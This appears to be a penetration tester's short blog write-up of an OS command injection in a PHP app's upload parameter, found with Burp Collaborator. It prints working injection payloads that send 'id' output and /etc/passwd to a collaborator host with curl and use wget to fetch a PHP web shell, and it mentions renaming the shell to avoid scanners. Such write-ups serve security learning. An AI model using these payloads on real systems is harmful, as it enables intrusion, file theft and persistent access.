During a recent pentest of an app made with php, burp gave me a little surprise of a os commend injection
notification! I had fun playing around with it and it was in the oddest place. Burp had interaction with
collaborator so it was a solid notification.
The issue was found in one of the apps upload functions in a var called KeyId. Which was
i think passed to the php system call (or exec,passthru,etc.) for some reason. Here is the payload burp
was using to get collaborator interaction:
14316'"`0&nslookup -q=cname fo70trk51oioge2t1p2zzdvvdmjp7fvcj46wul.burpcollaborator.net.&`'
So for RCE I needed to use a str like:
14316'"`0&< CMD >&`'
First I wanted verify I had access to the system so I thought I would use curl to exfil the results of running a cmd, and my
first choice was id to check my privs on the system. So I used this str:
14316'"`0&id|curl -d @- http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`'
This confirmed I can run system cmds, exfil the data, and that I was running them as a low level user.
Then I start to exfil files to look for priv esc and gather info. I also used curl for this to make POST
requests to burp collab and put file data in POST data. Here is an example str:
14316'"`0&curl -F file=@/etc/passwd http://fatp2jmvxxrrzecu3nrjo99thknbb0.burpcollaborator.net/&`'
After getting a few files pulled down I figured the next move was to try to get a web shell on the system
to continue to check priv esc. I would have purffered Metasploit, but due to the many network restrictions, it
wasn’t an option so I figured I would try to get the system to pull down a php web shell from the web.
Which worked like a charm. Here is the str I used to dl files from the web:
14316'"`0&wget
https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/9377612eee
a89aed2b226a870e76ac12965d6694/easy-simple-php-webshell.php&`'
Because the web shell is a github project I changed the name of the shell right away incase of
automated scanners looking for easy wins. So that is it, have fun and stay safe out there.